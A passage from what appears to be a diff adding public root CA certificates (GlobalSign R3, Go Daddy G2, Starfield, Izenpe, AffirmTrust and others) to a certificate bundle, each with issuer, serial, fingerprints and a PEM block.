+h8U+iQIDAQABo0IwQDAdBgNVHQ4EFgQUW/hNT7KlhtQ60vFjmqC+CfZXt94wDgYD +VR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEB +AKChOBZmLqdWHyGcBvod7bkixTgm2E5P7KN/ed5GIaGHd48HCJqypMWvDzKYC3xm +KbabfSVSSUOrTC4rbnpwrxYO4wJs+0LmGJ1F2FXI6Dvd5+H0LgscNFxsWEr7jIhQ +X5Ucv+2rIrVls4W6ng+4reV6G4pQOh29Dbx7VFALuUKvVaAYga1lme++5Jy/xIWr +QbJUb9wlze144o4MjQlJ3WN7WmmWAiGovVJZ6X01y8hSyn+B/tlr0/cR7SXf+Of5 +pPpyl4RTDaXQMhhRdlkUbA/r7F+AjHVDg8OFmP9Mni0N5HeDk061lgeLKBObjBmN +QSdJQO7e5iNEOdyhIta6A/I= +-----END CERTIFICATE----- + +# Issuer: CN=Microsec e-Szigno Root CA 2009 O=Microsec Ltd. +# Subject: CN=Microsec e-Szigno Root CA 2009 O=Microsec Ltd. +# Label: "Microsec e-Szigno Root CA 2009" +# Serial: 14014712776195784473 +# MD5 Fingerprint: f8:49:f4:03:bc:44:2d:83:be:48:69:7d:29:64:fc:b1 +# SHA1 Fingerprint: 89:df:74:fe:5c:f4:0f:4a:80:f9:e3:37:7d:54:da:91:e1:01:31:8e +# SHA256 Fingerprint: 3c:5f:81:fe:a5:fa:b8:2c:64:bf:a2:ea:ec:af:cd:e8:e0:77:fc:86:20:a7:ca:e5:37:16:3d:f3:6e:db:f3:78 +-----BEGIN CERTIFICATE----- +MIIECjCCAvKgAwIBAgIJAMJ+QwRORz8ZMA0GCSqGSIb3DQEBCwUAMIGCMQswCQYD +VQQGEwJIVTERMA8GA1UEBwwIQnVkYXBlc3QxFjAUBgNVBAoMDU1pY3Jvc2VjIEx0 +ZC4xJzAlBgNVBAMMHk1pY3Jvc2VjIGUtU3ppZ25vIFJvb3QgQ0EgMjAwOTEfMB0G +CSqGSIb3DQEJARYQaW5mb0BlLXN6aWduby5odTAeFw0wOTA2MTYxMTMwMThaFw0y +OTEyMzAxMTMwMThaMIGCMQswCQYDVQQGEwJIVTERMA8GA1UEBwwIQnVkYXBlc3Qx +FjAUBgNVBAoMDU1pY3Jvc2VjIEx0ZC4xJzAlBgNVBAMMHk1pY3Jvc2VjIGUtU3pp +Z25vIFJvb3QgQ0EgMjAwOTEfMB0GCSqGSIb3DQEJARYQaW5mb0BlLXN6aWduby5o +dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOn4j/NjrdqG2KfgQvvP +kd6mJviZpWNwrZuuyjNAfW2WbqEORO7hE52UQlKavXWFdCyoDh2Tthi3jCyoz/tc +cbna7P7ofo/kLx2yqHWH2Leh5TvPmUpG0IMZfcChEhyVbUr02MelTTMuhTlAdX4U +fIASmFDHQWe4oIBhVKZsTh/gnQ4H6cm6M+f+wFUoLAKApxn1ntxVUwOXewdI/5n7 +N4okxFnMUBBjjqqpGrCEGob5X7uxUG6k0QrM1XF+H6cbfPVTbiJfyyvm1HxdrtbC +xkzlBQHZ7Vf8wSN5/PrIJIOV87VqUQHQd9bpEqH5GoP7ghu5sJf0dgYzQ0mg/wu1 ++rUCAwEAAaOBgDB+MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0G +A1UdDgQWBBTLD8bfQkPMPcu1SCOhGnqmKrs0aDAfBgNVHSMEGDAWgBTLD8bfQkPM +Pcu1SCOhGnqmKrs0aDAbBgNVHREEFDASgRBpbmZvQGUtc3ppZ25vLmh1MA0GCSqG +SIb3DQEBCwUAA4IBAQDJ0Q5eLtXMs3w+y/w9/w0olZMEyL/azXm4Q5DwpL7v8u8h +mLzU1F0G9u5C7DBsoKqpyvGvivo/C3NqPuouQH4frlRheesuCDfXI/OMn74dseGk +ddug4lQUsbocKaQY9hK6ohQU4zE1yED/t+AFdlfBHFny+L/k7SViXITwfn4fs775 +tyERzAMBVnCnEJIeGzSBHq2cGsMEPO0CYdYeBvNfOofyK/FFh+U9rNHHV4S9a67c +2Pm2G2JwCz02yULyMtd6YebS2z3PyKnJm9zbWETXbzivf3jTo60adbocwTZ8jx5t +HMN1Rq41Bab2XD0h7lbwyYIiLXpUq3DDfSJlgnCW +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R3 +# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R3 +# Label: "GlobalSign Root CA - R3" +# Serial: 4835703278459759426209954 +# MD5 Fingerprint: c5:df:b8:49:ca:05:13:55:ee:2d:ba:1a:c3:3e:b0:28 +# SHA1 Fingerprint: d6:9b:56:11:48:f0:1c:77:c5:45:78:c1:09:26:df:5b:85:69:76:ad +# SHA256 Fingerprint: cb:b5:22:d7:b7:f1:27:ad:6a:01:13:86:5b:df:1c:d4:10:2e:7d:07:59:af:63:5a:7c:f4:72:0d:c9:63:c5:3b +-----BEGIN CERTIFICATE----- +MIIDXzCCAkegAwIBAgILBAAAAAABIVhTCKIwDQYJKoZIhvcNAQELBQAwTDEgMB4G +A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjMxEzARBgNVBAoTCkdsb2JhbFNp +Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMDkwMzE4MTAwMDAwWhcNMjkwMzE4 +MTAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEG +A1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAMwldpB5BngiFvXAg7aEyiie/QV2EcWtiHL8 +RgJDx7KKnQRfJMsuS+FggkbhUqsMgUdwbN1k0ev1LKMPgj0MK66X17YUhhB5uzsT +gHeMCOFJ0mpiLx9e+pZo34knlTifBtc+ycsmWQ1z3rDI6SYOgxXG71uL0gRgykmm +KPZpO/bLyCiR5Z2KYVc3rHQU3HTgOu5yLy6c+9C7v/U9AOEGM+iCK65TpjoWc4zd +QQ4gOsC0p6Hpsk+QLjJg6VfLuQSSaGjlOCZgdbKfd/+RFO+uIEn8rUAVSNECMWEZ +XriX7613t2Saer9fwRPvm2L7DWzgVGkWqQPabumDk3F2xmmFghcCAwEAAaNCMEAw +DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI/wS3+o +LkUkrk1Q+mOai97i3Ru8MA0GCSqGSIb3DQEBCwUAA4IBAQBLQNvAUKr+yAzv95ZU +RUm7lgAJQayzE4aGKAczymvmdLm6AC2upArT9fHxD4q/c2dKg8dEe3jgr25sbwMp +jjM5RcOO5LlXbKr8EpbsU8Yt5CRsuZRj+9xTaGdWPoO4zzUhw8lo/s7awlOqzJCK +6fBdRoyV3XpYKBovHd7NADdBj+1EbddTKJd+82cEHhXXipa0095MJ6RMG3NzdvQX +mcIfeg7jLQitChws/zyrVQ4PkX4268NXSb7hLi18YIvDQVETI53O9zJrlAGomecs +Mx86OyXShkDOOyyGeMlhLxS67ttVb9+E7gUJTb0o2HLO02JQZR7rkpeDMdmztcpH +WD9f +-----END CERTIFICATE----- + +# Issuer: CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Subject: CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Label: "Autoridad de Certificacion Firmaprofesional CIF A62634068" +# Serial: 6047274297262753887 +# MD5 Fingerprint: 73:3a:74:7a:ec:bb:a3:96:a6:c2:e4:e2:c8:9b:c0:c3 +# SHA1 Fingerprint: ae:c5:fb:3f:c8:e1:bf:c4:e5:4f:03:07:5a:9a:e8:00:b7:f7:b6:fa +# SHA256 Fingerprint: 04:04:80:28:bf:1f:28:64:d4:8f:9a:d4:d8:32:94:36:6a:82:88:56:55:3f:3b:14:30:3f:90:14:7f:5d:40:ef +-----BEGIN CERTIFICATE----- +MIIGFDCCA/ygAwIBAgIIU+w77vuySF8wDQYJKoZIhvcNAQEFBQAwUTELMAkGA1UE +BhMCRVMxQjBABgNVBAMMOUF1dG9yaWRhZCBkZSBDZXJ0aWZpY2FjaW9uIEZpcm1h +cHJvZmVzaW9uYWwgQ0lGIEE2MjYzNDA2ODAeFw0wOTA1MjAwODM4MTVaFw0zMDEy +MzEwODM4MTVaMFExCzAJBgNVBAYTAkVTMUIwQAYDVQQDDDlBdXRvcmlkYWQgZGUg +Q2VydGlmaWNhY2lvbiBGaXJtYXByb2Zlc2lvbmFsIENJRiBBNjI2MzQwNjgwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKlmuO6vj78aI14H9M2uDDUtd9 +thDIAl6zQyrET2qyyhxdKJp4ERppWVevtSBC5IsP5t9bpgOSL/UR5GLXMnE42QQM +cas9UX4PB99jBVzpv5RvwSmCwLTaUbDBPLutN0pcyvFLNg4kq7/DhHf9qFD0sefG +L9ItWY16Ck6WaVICqjaY7Pz6FIMMNx/Jkjd/14Et5cS54D40/mf0PmbR0/RAz15i +NA9wBj4gGFrO93IbJWyTdBSTo3OxDqqHECNZXyAFGUftaI6SEspd/NYrspI8IM/h +X68gvqB2f3bl7BqGYTM+53u0P6APjqK5am+5hyZvQWyIplD9amML9ZMWGxmPsu2b +m8mQ9QEM3xk9Dz44I8kvjwzRAv4bVdZO0I08r0+k8/6vKtMFnXkIoctXMbScyJCy +Z/QYFpM6/EfY0XiWMR+6KwxfXZmtY4laJCB22N/9q06mIqqdXuYnin1oKaPnirja +EbsXLZmdEyRG98Xi2J+Of8ePdG1asuhy9azuJBCtLxTa/y2aRnFHvkLfuwHb9H/T +KI8xWVvTyQKmtFLKbpf7Q8UIJm+K9Lv9nyiqDdVF8xM6HdjAeI9BZzwelGSuewvF +6NkBiDkal4ZkQdU7hwxu+g/GvUgUvzlN1J5Bto+WHWOWk9mVBngxaJ43BjuAiUVh +OSPHG0SjFeUc+JIwuwIDAQABo4HvMIHsMBIGA1UdEwEB/wQIMAYBAf8CAQEwDgYD +VR0PAQH/BAQDAgEGMB0GA1UdDgQWBBRlzeurNR4APn7VdMActHNHDhpkLzCBpgYD +VR0gBIGeMIGbMIGYBgRVHSAAMIGPMC8GCCsGAQUFBwIBFiNodHRwOi8vd3d3LmZp +cm1hcHJvZmVzaW9uYWwuY29tL2NwczBcBggrBgEFBQcCAjBQHk4AUABhAHMAZQBv +ACAAZABlACAAbABhACAAQgBvAG4AYQBuAG8AdgBhACAANAA3ACAAQgBhAHIAYwBl +AGwAbwBuAGEAIAAwADgAMAAxADcwDQYJKoZIhvcNAQEFBQADggIBABd9oPm03cXF +661LJLWhAqvdpYhKsg9VSytXjDvlMd3+xDLx51tkljYyGOylMnfX40S2wBEqgLk9 +am58m9Ot/MPWo+ZkKXzR4Tgegiv/J2Wv+xYVxC5xhOW1//qkR71kMrv2JYSiJ0L1 +ILDCExARzRAVukKQKtJE4ZYm6zFIEv0q2skGz3QeqUvVhyj5eTSSPi5E6PaPT481 +PyWzOdxjKpBrIF/EUhJOlywqrJ2X3kjyo2bbwtKDlaZmp54lD+kLM5FlClrD2VQS +3a/DTg4fJl4N3LON7NWBcN7STyQF82xO9UxJZo3R/9ILJUFI/lGExkKvgATP0H5k +SeTy36LssUzAKh3ntLFlosS88Zj0qnAHY7S42jtM+kAiMFsRpvAFDsYCA0irhpuF +3dvd6qJ2gHN99ZwExEWN57kci57q13XRcrHedUTnQn3iV2t93Jm8PYMo6oCTjcVM +ZcFwgbg4/EMxsvYDNEeyrPsiBsse3RdHHF9mudMaotoRsaS8I8nkvof/uZS2+F0g +StRf571oe2XyFR7SOqkt6dhrJKyXWERHrVkY8SFlcN7ONGCoQPHzPKTDKCOM/icz +Q0CgFzzr6juwcqajuUpLXhZI9LK8yIySxZ2frHI2vDSANGupi5LAuBft7HZT9SQB +jLMi6Et8Vcad+qMUu2WFbm5PEn4KPJ2V +-----END CERTIFICATE----- + +# Issuer: CN=Izenpe.com O=IZENPE S.A. +# Subject: CN=Izenpe.com O=IZENPE S.A. +# Label: "Izenpe.com" +# Serial: 917563065490389241595536686991402621 +# MD5 Fingerprint: a6:b0:cd:85:80:da:5c:50:34:a3:39:90:2f:55:67:73 +# SHA1 Fingerprint: 2f:78:3d:25:52:18:a7:4a:65:39:71:b5:2c:a2:9c:45:15:6f:e9:19 +# SHA256 Fingerprint: 25:30:cc:8e:98:32:15:02:ba:d9:6f:9b:1f:ba:1b:09:9e:2d:29:9e:0f:45:48:bb:91:4f:36:3b:c0:d4:53:1f +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=Go Daddy Root Certificate Authority - G2 O=GoDaddy.com, Inc. +# Subject: CN=Go Daddy Root Certificate Authority - G2 O=GoDaddy.com, Inc. +# Label: "Go Daddy Root Certificate Authority - G2" +# Serial: 0 +# MD5 Fingerprint: 80:3a:bc:22:c1:e6:fb:8d:9b:3b:27:4a:32:1b:9a:01 +# SHA1 Fingerprint: 47:be:ab:c9:22:ea:e8:0e:78:78:34:62:a7:9f:45:c2:54:fd:e6:8b +# SHA256 Fingerprint: 45:14:0b:32:47:eb:9c:c8:c5:b4:f0:d7:b5:30:91:f7:32:92:08:9e:6e:5a:63:e2:74:9d:d3:ac:a9:19:8e:da +-----BEGIN CERTIFICATE----- +MIIDxTCCAq2gAwIBAgIBADANBgkqhkiG9w0BAQsFADCBgzELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoT +EUdvRGFkZHkuY29tLCBJbmMuMTEwLwYDVQQDEyhHbyBEYWRkeSBSb290IENlcnRp +ZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5MDkwMTAwMDAwMFoXDTM3MTIzMTIz +NTk1OVowgYMxCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6b25hMRMwEQYDVQQH +EwpTY290dHNkYWxlMRowGAYDVQQKExFHb0RhZGR5LmNvbSwgSW5jLjExMC8GA1UE +AxMoR28gRGFkZHkgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgLSBHMjCCASIw +DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL9xYgjx+lk09xvJGKP3gElY6SKD +E6bFIEMBO4Tx5oVJnyfq9oQbTqC023CYxzIBsQU+B07u9PpPL1kwIuerGVZr4oAH +/PMWdYA5UXvl+TW2dE6pjYIT5LY/qQOD+qK+ihVqf94Lw7YZFAXK6sOoBJQ7Rnwy +DfMAZiLIjWltNowRGLfTshxgtDj6AozO091GB94KPutdfMh8+7ArU6SSYmlRJQVh +GkSBjCypQ5Yj36w6gZoOKcUcqeldHraenjAKOc7xiID7S13MMuyFYkMlNAJWJwGR +tDtwKj9useiciAF9n9T521NtYJ2/LOdYq7hfRvzOxBsDPAnrSTFcaUaz4EcCAwEA +AaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYE +FDqahQcQZyi27/a9BUFuIMGU2g/eMA0GCSqGSIb3DQEBCwUAA4IBAQCZ21151fmX +WWcDYfF+OwYxdS2hII5PZYe096acvNjpL9DbWu7PdIxztDhC2gV7+AJ1uP2lsdeu +9tfeE8tTEH6KRtGX+rcuKxGrkLAngPnon1rpN5+r5N9ss4UXnT3ZJE95kTXWXwTr +gIOrmgIttRD02JDHBHNA7XIloKmf7J6raBKZV8aPEjoJpL1E/QYVN8Gb5DKj7Tjo +2GTzLH4U/ALqn83/B2gX2yKQOC16jdFU8WnjXzPKej17CuPKf1855eJ1usV2GDPO +LPAvTK33sefOT6jEm0pUBsV/fdUID+Ic/n4XuKxe9tQWskMJDE32p2u0mYRlynqI +4uJEvlz36hz1 +-----END CERTIFICATE----- + +# Issuer: CN=Starfield Root Certificate Authority - G2 O=Starfield Technologies, Inc. +# Subject: CN=Starfield Root Certificate Authority - G2 O=Starfield Technologies, Inc. +# Label: "Starfield Root Certificate Authority - G2" +# Serial: 0 +# MD5 Fingerprint: d6:39:81:c6:52:7e:96:69:fc:fc:ca:66:ed:05:f2:96 +# SHA1 Fingerprint: b5:1c:06:7c:ee:2b:0c:3d:f8:55:ab:2d:92:f4:fe:39:d4:e7:0f:0e +# SHA256 Fingerprint: 2c:e1:cb:0b:f9:d2:f9:e1:02:99:3f:be:21:51:52:c3:b2:dd:0c:ab:de:1c:68:e5:31:9b:83:91:54:db:b7:f5 +-----BEGIN CERTIFICATE----- +MIID3TCCAsWgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT +HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAMTKVN0YXJmaWVs +ZCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5MDkwMTAwMDAw +MFoXDTM3MTIzMTIzNTk1OVowgY8xCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6 +b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFyZmllbGQgVGVj +aG5vbG9naWVzLCBJbmMuMTIwMAYDVQQDEylTdGFyZmllbGQgUm9vdCBDZXJ0aWZp +Y2F0ZSBBdXRob3JpdHkgLSBHMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC +ggEBAL3twQP89o/8ArFvW59I2Z154qK3A2FWGMNHttfKPTUuiUP3oWmb3ooa/RMg +nLRJdzIpVv257IzdIvpy3Cdhl+72WoTsbhm5iSzchFvVdPtrX8WJpRBSiUZV9Lh1 +HOZ/5FSuS/hVclcCGfgXcVnrHigHdMWdSL5stPSksPNkN3mSwOxGXn/hbVNMYq/N +Hwtjuzqd+/x5AJhhdM8mgkBj87JyahkNmcrUDnXMN/uLicFZ8WJ/X7NfZTD4p7dN +dloedl40wOiWVpmKs/B/pM293DIxfJHP4F8R+GuqSVzRmZTRouNjWwl2tVZi4Ut0 +HZbUJtQIBFnQmA4O5t78w+wfkPECAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAO +BgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFHwMMh+n2TB/xH1oo2Kooc6rB1snMA0G +CSqGSIb3DQEBCwUAA4IBAQARWfolTwNvlJk7mh+ChTnUdgWUXuEok21iXQnCoKjU +sHU48TRqneSfioYmUeYs0cYtbpUgSpIB7LiKZ3sx4mcujJUDJi5DnUox9g61DLu3 +4jd/IroAow57UvtruzvE03lRTs2Q9GcHGcg8RnoNAX3FWOdt5oUwF5okxBDgBPfg +8n/Uqgr/Qh037ZTlZFkSIHc40zI+OIF1lnP6aI+xy84fxez6nH7PfrHxBy22/L/K +pL/QlwVKvOoYKAKQvVR4CSFx09F9HdkWsKlhPdAKACL8x3vLCWRFCztAgfd9fDL1 +mMpYjn0q7pBZc2T5NnReJaH1ZgUufzkVqSr7UIuOhWn0 +-----END CERTIFICATE----- + +# Issuer: CN=Starfield Services Root Certificate Authority - G2 O=Starfield Technologies, Inc. +# Subject: CN=Starfield Services Root Certificate Authority - G2 O=Starfield Technologies, Inc. +# Label: "Starfield Services Root Certificate Authority - G2" +# Serial: 0 +# MD5 Fingerprint: 17:35:74:af:7b:61:1c:eb:f4:f9:3c:e2:ee:40:f9:a2 +# SHA1 Fingerprint: 92:5a:8f:8d:2c:6d:04:e0:66:5f:59:6a:ff:22:d8:63:e8:25:6f:3f +# SHA256 Fingerprint: 56:8d:69:05:a2:c8:87:08:a4:b3:02:51:90:ed:cf:ed:b1:97:4a:60:6a:13:c6:e5:29:0f:cb:2a:e6:3e:da:b5 +-----BEGIN CERTIFICATE----- +MIID7zCCAtegAwIBAgIBADANBgkqhkiG9w0BAQsFADCBmDELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT +HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xOzA5BgNVBAMTMlN0YXJmaWVs +ZCBTZXJ2aWNlcyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5 +MDkwMTAwMDAwMFoXDTM3MTIzMTIzNTk1OVowgZgxCzAJBgNVBAYTAlVTMRAwDgYD +VQQIEwdBcml6b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFy +ZmllbGQgVGVjaG5vbG9naWVzLCBJbmMuMTswOQYDVQQDEzJTdGFyZmllbGQgU2Vy +dmljZXMgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgLSBHMjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBANUMOsQq+U7i9b4Zl1+OiFOxHz/Lz58gE20p +OsgPfTz3a3Y4Y9k2YKibXlwAgLIvWX/2h/klQ4bnaRtSmpDhcePYLQ1Ob/bISdm2 +8xpWriu2dBTrz/sm4xq6HZYuajtYlIlHVv8loJNwU4PahHQUw2eeBGg6345AWh1K +Ts9DkTvnVtYAcMtS7nt9rjrnvDH5RfbCYM8TWQIrgMw0R9+53pBlbQLPLJGmpufe +hRhJfGZOozptqbXuNC66DQO4M99H67FrjSXZm86B0UVGMpZwh94CDklDhbZsc7tk +6mFBrMnUVN+HL8cisibMn1lUaJ/8viovxFUcdUBgF4UCVTmLfwUCAwEAAaNCMEAw +DwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFJxfAN+q +AdcwKziIorhtSpzyEZGDMA0GCSqGSIb3DQEBCwUAA4IBAQBLNqaEd2ndOxmfZyMI +bw5hyf2E3F/YNoHN2BtBLZ9g3ccaaNnRbobhiCPPE95Dz+I0swSdHynVv/heyNXB +ve6SbzJ08pGCL72CQnqtKrcgfU28elUSwhXqvfdqlS5sdJ/PHLTyxQGjhdByPq1z +qwubdQxtRbeOlKyWN7Wg0I8VRw7j6IPdj/3vQQF3zCepYoUz8jcI73HPdwbeyBkd +iEDPfUYd/x7H4c7/I9vG+o1VTqkC50cRRj70/b17KSa7qWFiNyi2LSr2EIZkyXCn +0q23KXB56jzaYyWf/Wi3MOxw+3WKt21gZ7IeyLnp2KhvAotnDU0mV3HaIPzBSlCN +sSi6 +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Commercial O=AffirmTrust +# Subject: CN=AffirmTrust Commercial O=AffirmTrust +# Label: "AffirmTrust Commercial" +# Serial: 8608355977964138876 +# MD5 Fingerprint: 82:92:ba:5b:ef:cd:8a:6f:a6:3d:55:f9:84:f6:d6:b7 +# SHA1 Fingerprint: f9:b5:b6:32:45:5f:9c:be:ec:57:5f:80:dc:e9:6e:2c:c7:b2:78:b7 +# SHA256 Fingerprint: 03:76:ab:1d:54:c5:f9:80:3c:e4:b2:e2:01:a0:ee:7e:ef:7b:57:b6:36:e8:a9:3c:9b:8d:48:60:c9:6f:5f:a7 +-----BEGIN CERTIFICATE----- +MIIDTDCCAjSgAwIBAgIId3cGJyapsXwwDQYJKoZIhvcNAQELBQAwRDELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZpcm1UcnVz +dCBDb21tZXJjaWFsMB4XDTEwMDEyOTE0MDYwNloXDTMwMTIzMTE0MDYwNlowRDEL +MAkGA1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZp +cm1UcnVzdCBDb21tZXJjaWFsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEA9htPZwcroRX1BiLLHwGy43NFBkRJLLtJJRTWzsO3qyxPxkEylFf6EqdbDuKP +Hx6GGaeqtS25Xw2Kwq+FNXkyLbscYjfysVtKPcrNcV/pQr6U6Mje+SJIZMblq8Yr +ba0F8PrVC8+a5fBQpIs7R6UjW3p6+DM/uO+Zl+MgwdYoic+U+7lF7eNAFxHUdPAL +MeIrJmqbTFeurCA+ukV6BfO9m2kVrn1OIGPENXY6BwLJN/3HR+7o8XYdcxXyl6S1 +yHp52UKqK39c/s4mT6NmgTWvRLpUHhwwMmWd5jyTXlBOeuM61G7MGvv50jeuJCqr +VwMiKA1JdX+3KNp1v47j3A55MQIDAQABo0IwQDAdBgNVHQ4EFgQUnZPGU4teyq8/ +nx4P5ZmVvCT2lI8wDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwDQYJ +KoZIhvcNAQELBQADggEBAFis9AQOzcAN/wr91LoWXym9e2iZWEnStB03TX8nfUYG +XUPGhi4+c7ImfU+TqbbEKpqrIZcUsd6M06uJFdhrJNTxFq7YpFzUf1GO7RgBsZNj +vbz4YYCanrHOQnDiqX0GJX0nof5v7LMeJNrjS1UaADs1tDvZ110w/YETifLCBivt +Z8SOyUOyXGsViQK8YvxO8rUzqrJv0wqiUOP2O+guRMLbZjipM1ZI8W0bM40NjD9g +N53Tym1+NH4Nn3J2ixufcv1SNUFFApYvHLKac0khsUlHRUe072o0EclNmsxZt9YC +nlpOZbWUrhvfKbAW8b8Angc6F2S1BLUjIZkKlTuXfO8= +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Networking O=AffirmTrust +# Subject: CN=AffirmTrust Networking O=AffirmTrust +# Label: "AffirmTrust Networking" +# Serial: 8957382827206547757 +# MD5 Fingerprint: 42:65:ca:be:01:9a:9a:4c:a9:8c:41:49:cd:c0:d5:7f +# SHA1 Fingerprint: 